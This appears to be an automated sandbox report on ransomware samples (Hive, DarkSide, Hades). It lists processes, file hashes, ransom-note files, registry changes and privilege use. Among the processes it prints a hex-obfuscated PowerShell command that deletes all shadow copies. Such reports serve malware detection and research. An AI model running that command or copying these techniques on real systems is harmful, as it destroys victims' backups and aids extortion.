C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\System32\WaaSMedicAgent.exe

C:\Windows\System32\WaaSMedicAgent.exe 0afeecc500f731ad21de2ce7b24e1d79 X8jK9B9SSUivmUh7Jvn8SQ.0.1.0.0.0

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

Network

Files

memory/4004-0-0x0000000000F10000-0x00000000011E9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\hive.bat

MD5 6358d970c3edccb57eae7dbf9f42d58f
SHA1 25b994c3b5604f4f67e1ac6250bc2f14ce690380
SHA256 9e36401051e677f69a82ab8fbdebd6b16210ee40612c8c7fa45ceb5d7757fe50
SHA512 44819fec7e90b903eece750d0a2de531520ed9e637e17e4a57786f9a61c6d4b95ff6072fc3530a9d35d8dc756bcfe20f80a6a07a72d35cf24b305053ae389131

C:\$Recycle.Bin\S-1-5-21-2539840389-1261165778-1087677076-1000\desktop.ini

MD5 f66bd8c4a0c3f208d38e64628d9a329d
SHA1 42b37f09b12463003ad23b3aa0e68c77d0aef3f8
SHA256 4bd462a2312dabd402bbeb87bf13e933ac47284ff027d547cf46fdab7e13791b
SHA512 fec4fc2f2a91f04ab87225020f12f2bddc1a0316a482d041999b6293e8e4ca0f8ce6b9a0dbaae61089c2a5909ef0ef5e27a51c7912fb1b3318b6aad950e9e4d7

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\shadow.bat

MD5 df5552357692e0cba5e69f8fbf06abb6
SHA1 4714f1e6bb75a80a8faf69434726d176b70d7bd8
SHA256 d158f9d53e7c37eadd3b5cc1b82d095f61484e47eda2c36d9d35f31c0b4d3ff8
SHA512 a837555a1175ab515e2b43da9e493ff0ccd4366ee59defe6770327818ca9afa6f3e39ecdf5262b69253aa9e2692283ee8cebc97d58edd42e676977c7f73d143d

memory/4004-865-0x0000000000F10000-0x00000000011E9000-memory.dmp

memory/4004-2733-0x0000000000F10000-0x00000000011E9000-memory.dmp

memory/4004-3489-0x0000000000F10000-0x00000000011E9000-memory.dmp

memory/4004-4232-0x0000000000F10000-0x00000000011E9000-memory.dmp

memory/4004-4981-0x0000000000F10000-0x00000000011E9000-memory.dmp

memory/4004-6249-0x0000000000F10000-0x00000000011E9000-memory.dmp

memory/4004-9141-0x0000000000F10000-0x00000000011E9000-memory.dmp

memory/4004-9907-0x0000000000F10000-0x00000000011E9000-memory.dmp

C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.P7EsMTWem2f4DapaPblE9Dlz_RIz8E18M8Wn___Y6AI.hive

MD5 9e95c9286aa916de80a68960ed66b52d
SHA1 f2f8c6fd0ea28bca1a63cd2594afc3942b416c3f
SHA256 08ceabcb4f55ab059a42a4588e67b9aac327e3fe45047927a1fa7b30861a0576
SHA512 1884c4398cbd4f7300ca03a25b1fcc814a8d2809dd438409ac9e2d1ca764569e55c6bfc60235949dade710ce0549fcbf41b929179f677219e076a895fd8d5db1

memory/4004-11851-0x0000000000F10000-0x00000000011E9000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat

MD5 c9c0dfee4ea69bbc4edbbd1684c97f7d
SHA1 1fb65f2c4b44b8c8795a8f3b7303137869d4a132
SHA256 dc7ada2e6705249f64ee7a50ad5c268ea469a38d691d05b32991ca3bb426d380
SHA512 a4c6b4bd7c21b9e54feb21e8fbf62debd93c9eb41da683156d11a24e93283e14628160780b6130df5e27704d8a5ec0bd87244d2e03c8cb735fd7809749abe5f5

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133648406469969338.txt

MD5 ecaea544af9da1114077b951d8cb520d
SHA1 5820b2d71e7b2543cf1804eb91716c4e9f732fde
SHA256 9117b26ab2c8fdbb8223fe1f2d1770c50a6cf0d9849a5849d6aebcbe90435be6
SHA512 dc7bedbc581818011aa2d313429f234b12e5e9cf320b02b8d7ceeaf9cdc1c921ffc51af7f4080b02740f2d2146fbb006ccbf37cdcba3e3a10009142daffdb919

memory/4004-11876-0x0000000000F10000-0x00000000011E9000-memory.dmp

memory/4004-11877-0x0000000000F10000-0x00000000011E9000-memory.dmp

F:\$RECYCLE.BIN\HOW_TO_DECRYPT.txt

MD5 ee4ad142674725d6d9b58c9c3bb836dc
SHA1 ac9bac37131c72a549d2bf3fbd233061906d5fab
SHA256 fc1f1ed6a6692d18788de47420ead7e8a1b534b015db69a39052a0a2fc30c776
SHA512 a34c547d13880b578703f52b7d3d61b1893536966204d80a9e0f60aee8851bd9f70e3d0ceb1601aa11901c6315f57128c49f2000cc4fcbc67ed92e4628e45da3

Analysis: behavioral20

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win10v2004-20240704-en

Max time kernel

1695s

Max time network

1156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe"

Signatures

DarkSide

ransomware darkside

Renames multiple (133) files with added filename extension

ransomware

Reads user/profile data of web browsers

spyware stealer

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\5a727a6e.BMP" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\5a727a6e.BMP" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\5a727a6e\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\5a727a6e.ico" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.5a727a6e C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.5a727a6e\ = "5a727a6e" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\5a727a6e\DefaultIcon C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\5a727a6e C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: 36 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Files

memory/3656-1-0x00007FF841003000-0x00007FF841005000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s4ckz4me.vlp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3656-11-0x000002089FF90000-0x000002089FFB2000-memory.dmp

memory/3656-12-0x00007FF841000000-0x00007FF841AC1000-memory.dmp

memory/3656-13-0x00007FF841000000-0x00007FF841AC1000-memory.dmp

memory/3656-16-0x00007FF841000000-0x00007FF841AC1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 556084f2c6d459c116a69d6fedcc4105
SHA1 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f58e73a5c43b0713d39bb6cca4251670
SHA1 ece141754053a0d3855b7270a9569601e99dbbf6
SHA256 f374315ca436a4f0505cdc56d043e1176df91064603a38001902cf596262d015
SHA512 1872b460e63288eabd785e10c76ee0b35bb9c37891193ad4ac0992e37f2fd6d9e692cea26ceec58b219b892910825e80d8e009c161d36735eb1dd839d4622ee8

C:\Users\Admin\README.5a727a6e.TXT

MD5 d4e176b40c4ea17f4870c34fad926d6e
SHA1 2cc3e4c6cf00e4a2ac0e16e9f7b0ccf2421b92e0
SHA256 7ee422c323ddbda59934ed7bfa6217cfe06bdb50165b7d4b6115475f1df7af0c
SHA512 feaa913ae99db210db088423a9813e1efedd89d80817bf485a4d9f8ea349b86932ac16ba0473bd224ff150603507bd289d01aebc1a702372a076a167b632f471

Analysis: behavioral26

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:40

Platform

win10v2004-20240508-en

Max time kernel

1751s

Max time network

1764s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe"

Signatures

Hades Ransomware

ransomware hades

Hades payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

CryptOne packer

cryptone packer
Description Indicator Process Target
N/A N/A N/A N/A

Renames multiple (160) files with added filename extension

ransomware

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\DsDownload\Serv N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4864 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe C:\Users\Admin\AppData\Roaming\DsDownload\Serv
PID 4864 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe C:\Users\Admin\AppData\Roaming\DsDownload\Serv
PID 2456 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Roaming\DsDownload\Serv C:\Windows\SYSTEM32\cmd.exe
PID 2456 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Roaming\DsDownload\Serv C:\Windows\SYSTEM32\cmd.exe
PID 4864 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe C:\Windows\SYSTEM32\cmd.exe
PID 4864 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe C:\Windows\SYSTEM32\cmd.exe
PID 1884 wrote to memory of 3116 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\waitfor.exe
PID 1884 wrote to memory of 3116 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\waitfor.exe
PID 1884 wrote to memory of 2024 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 1884 wrote to memory of 2024 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 4624 wrote to memory of 4376 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\waitfor.exe
PID 4624 wrote to memory of 4376 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\waitfor.exe
PID 4624 wrote to memory of 4440 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 4624 wrote to memory of 4440 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe

